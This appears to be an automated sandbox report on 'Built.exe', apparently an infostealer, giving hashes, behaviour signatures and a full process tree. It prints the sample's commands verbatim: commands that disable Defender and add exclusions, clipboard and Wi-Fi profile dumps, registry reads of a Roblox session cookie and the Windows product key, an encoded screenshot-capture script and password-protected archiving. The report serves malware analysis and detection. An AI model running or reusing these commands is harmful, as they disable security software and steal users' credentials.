Resubmissions

25-11-2024 21:58

241125-1vs61avpdp 10

25-11-2024 20:17

241125-y2yzqa1lbl 10

25-11-2024 19:39

241125-ycymnasng1 10

Analysis

  • max time kernel
    5s
  • max time network
    13s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-11-2024 19:39

General

  • Target

    Built.exe

  • Size

    6.9MB

  • MD5

    bf82e290835d6048e2e4b6c24b6cb18e

  • SHA1

    753c01795c38c4aa42dba06b5dc60496eb6f739e

  • SHA256

    2b6cbd322c535ad23e40cc0d17b6ab42dd70a7cccacbfe493473b1a4934b1b03

  • SHA512

    07d2cd28a3f17193c203def83eec803bd5fcbc64831db46327fdb842470c69ad770e0afe25092debfc7ba38cfcdebd6d6e87d8c3e5177cc314f60d5f06524c48

  • SSDEEP

    98304:qJDjWM8JEE1FOSamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFZ:qJ06eNTfm/pf+xk4dWRpmrbW3jmrx

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏​‍.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:792
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏​‍.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3480
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1084
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3096
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1004
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2912
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:1232
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4712
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4036
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1080
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:2384
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3940
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\us5ck3wq\us5ck3wq.cmdline"
                5⤵
                  PID:4232
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7ABE.tmp" "c:\Users\Admin\AppData\Local\Temp\us5ck3wq\CSC7FCE999A240E458DA032783AD87ECF1E.TMP"
                    6⤵
                      PID:2132
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3900
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2796
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:840
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                    PID:1684
                    • C:\Windows\system32\attrib.exe
                      attrib +r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:4956
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3656
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3284
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                          PID:1532
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            4⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3604
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:2516
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:1908
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:1576
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:1724
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1516
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:1828
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:2828
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1232
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:2384
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2160
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:1016
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:1040
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DxckJ.zip" *"
                                              3⤵
                                                PID:4672
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI10282\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI10282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DxckJ.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:836
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:3372
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    4⤵
                                                      PID:792
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic os get Caption
                                                      4⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5004
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                    3⤵
                                                      PID:3448
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic computersystem get totalphysicalmemory
                                                        4⤵
                                                          PID:4232
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                        3⤵
                                                          PID:3724
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic csproduct get uuid
                                                            4⤵
                                                              PID:5020
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                            3⤵
                                                              PID:2960
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:3480
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                              3⤵
                                                                PID:4676
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic path win32_VideoController get name
                                                                  4⤵
                                                                  • Detects videocard installed
                                                                  PID:3132
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                3⤵
                                                                  PID:2380
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                    4⤵
                                                                      PID:2852
